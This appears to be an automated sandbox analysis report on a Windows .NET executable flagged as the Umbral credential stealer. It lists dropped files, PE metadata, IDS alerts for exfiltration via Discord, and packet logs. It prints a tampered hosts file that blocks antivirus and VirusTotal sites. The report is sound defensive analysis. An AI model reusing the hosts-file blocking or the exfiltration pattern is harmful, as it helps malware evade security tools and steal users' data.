                                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G....y....;.5.....U.=3...o.Q..y.$. <T.].AB./...$......G.".t.H.. &.....#..2w.#..Z...."..<.B.Y_...s..i.<>....s..Q......I.......Y0./.O.....>.h?.oBf*..{M..8.9f....I..>\`..4.......|..E1..'..8|.J....b.....t....a.c..{..#.9.G....s.M..G...../...i.Y$...(f......;.J......{n_4.w..2.....n.G....e..".......`.m......y.M......?...7-....l(..3.{C.7.....7.E.}..-.........^?.........z..}.[....u...k..~m;.Z.z.y.5s...._3..;..J..^.V....1...3/....|......X...k...zE.$s..i....9.=39?{H....xf.K.Y...../+h=s..ml.K.N...g.|i.}.%..bU...[y.e%........r.0..{..if.KRw..Sg.......cZ...W.tyZ.kV.q%.\...<..}a....t.Y_F....c.!.+..8../...zv...{}...ml......s..k.W..........2......f.:?u.<..5../.V.;{.[.V..b......H.......?...(....3..{>s.....\.{...9..|f.s........3.0..........]...|n...2_.[...b...n.c.+w....t.{.W...s;..y.z.N.n.....s...q.@n.n.w.c^.....Y....%.Z}..EN..3V.

                                                C:\Users\user\AppData\Local\Temp\ArtZhN3x4FUP6qs

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.8553638852307782
                                                Encrypted:false
                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\O7kovWFCAi0v7O9

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                Category:dropped
                                                Size (bytes):49152
                                                Entropy (8bit):0.8180424350137764
                                                Encrypted:false
                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1noxpisd.1ft.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b32snpdu.22u.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5gvuowe.jgr.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htzloylj.jlb.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hutic1gq.nax.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kz42x4f1.jya.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5hzs0uy.2j2.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnbm51zn.z0r.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odtmuuec.usk.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouq1vbrl.o3d.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueimhs1m.qnb.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrg2emex.nff.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\oAi9TOsv6Lhv6Wg

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                Category:dropped
                                                Size (bytes):28672
                                                Entropy (8bit):2.5793180405395284
                                                Encrypted:false
                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\System32\drivers\etc\hosts

                                                Download File
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):2223
                                                Entropy (8bit):4.573013811987098
                                                Encrypted:false
                                                SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                Malicious:true
                                                Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.020784348942329
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:zamPeEkHWr.exe
                                                File size:232'448 bytes
                                                MD5:ef323a7483653ffb1fc4ff036576e065
                                                SHA1:80e63b57a7ad6394f778c7aa5a855520f1533589
                                                SHA256:824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a
                                                SHA512:04785049f73acbacc2b0ea89e2bbc547ac6fa302eac4cbbd895f8d6a873c8b0dcfa8a8762d90847c9a0bf28862e12b294cb70f073019a6046bac104b9189ba7e
                                                SSDEEP:6144:eloZM3fsXtioRkts/cnnK6cMluDdCFzQEb0CzFQMpnhb8e1msQci:IoZ1tlRk83MluDdCFzQEb0CzFQMpZ3K
                                                TLSH:E5346B4933B88B17E25F8BBDD5B1548F87B1F143E90AF7CE0C8895E82421B42E949E57
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................

                                                File Icon

                                                Icon Hash:90cececece8e8eb0

                                                Static PE Info

                                                General

                                                Entrypoint:0x43a1ee
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3a19c0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x550.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3a1800x1c.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x381f40x38200057ad300337fa0180fe5580905656531False0.3940788557906459data6.036556243081606IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x3c0000x5500x600962661cf515c57234d66775c661dfadeFalse0.4134114583333333data4.575008625258809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x3e0000xc0x2004aaa7e975e1a908d2684e1f48bb6854bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x3c0a00x2c4data0.4449152542372881
                                                RT_MANIFEST0x3c3640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                2024-08-05T15:44:50.851858+0200TCP2045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)49740443192.168.2.4162.159.138.232
                                                2024-08-05T15:44:27.256131+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H4973880192.168.2.4208.95.112.1

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 5, 2024 15:43:49.060046911 CEST4973180192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:43:49.064918041 CEST8049731208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:43:49.065156937 CEST4973180192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:43:49.065330029 CEST4973180192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:43:49.070539951 CEST8049731208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:43:49.522703886 CEST8049731208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:43:49.563059092 CEST4973180192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:26.748496056 CEST4973880192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:26.755994081 CEST8049738208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:44:26.756336927 CEST4973880192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:26.756620884 CEST4973880192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:26.761522055 CEST8049738208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:44:27.241185904 CEST8049738208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:44:27.256130934 CEST4973880192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:27.261534929 CEST8049738208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:44:27.263751030 CEST4973880192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:28.785027981 CEST8049731208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:44:28.785131931 CEST4973180192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:50.105669975 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.105722904 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.105781078 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.106453896 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.106468916 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.570710897 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.570867062 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.576987982 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.577013016 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.577311039 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.588633060 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.588875055 CEST4973180192.168.2.4208.95.112.1
                                                Aug 5, 2024 15:44:50.595911026 CEST8049731208.95.112.1192.168.2.4
                                                Aug 5, 2024 15:44:50.632515907 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.703192949 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.709532976 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.709573030 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.851871014 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.852569103 CEST44349740162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.852655888 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.859075069 CEST49740443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.861491919 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.861543894 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:50.861649036 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.862303019 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:50.862322092 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.321618080 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.323159933 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.323201895 CEST44349741162.159.138.232192.168.2.4
